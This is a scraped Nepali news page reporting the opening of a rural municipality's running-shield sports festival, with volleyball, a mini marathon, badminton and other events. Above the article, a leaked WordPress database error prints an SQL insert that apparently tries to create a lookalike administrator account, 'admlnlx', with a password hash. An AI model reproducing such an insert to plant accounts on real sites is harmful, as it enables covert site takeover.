WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bjrz6rTSRGz9deNfal2VzaL.0DN2FD1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 19:27:24', '', 'admlnlx', 'admlnlx')

अध्यक्ष रनिङशिल्डको भब्याताका साथ उद्घाटन – Gaule Khabar

अध्यक्ष रनिङशिल्डको भब्याताका साथ उद्घाटन

अध्यक्ष रनिङशिल्डको भब्याताका साथ उद्घाटन

गाउँले न्यूज, ५ माघ, काठमाण्डौ । थुलुङ दुधकोशी गाउँपालिकाद्वारा आयोजित प्रथम अध्यक्ष रनिङशिल्ड तथा बृहत खेलकुद कार्यक्रमको भब्याताका साथ उद्घाटन भएको छ ।

थुलुङ दुधकोशी गाउँपालिकाको केन्द्र मुक्लिमा आयोजित कार्यक्रमको उत्घाटन मानानीय हेमकुमार राई ‘सुरबिर’ र गाउँपालिका अध्यक्ष अशिम राईले दियोमा बत्ती बालेर कार्यक्रमको उत्घाटन  गर्नु भयो ।

कार्यक्रमलाई सम्बोधन गर्दै मानानीय राईले अहिलेको सरकार संघियाता कार्यान्वनको आधारभुत कुरामै लागि परेको छ, अबको १० महिना भित्र नतिजामुखि विकास देखिने दाबी गरे साथै खेलकुद मानव स्वास्थ्यका लागि आवश्यक हुने भन्दै यसको विशिष्टकरण हुन जरुरी रहेको बताए ।

आज बाट ७ गते सम्म सन्चालन हुने खेल्कुद महोत्सबमा जिल्ला ब्यापी खुला वडा स्तरिय महिला पुरुष भलिबल, महिला पुरुष मिनी म्यारथुन, मार्सल आर्ट, महिला पुरुष ब्याटमिन्टन, एकल नृत्य, एकल ट्र्याक गायन प्रतियोगिताको प्रतिस्पर्दा सुरु भएको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका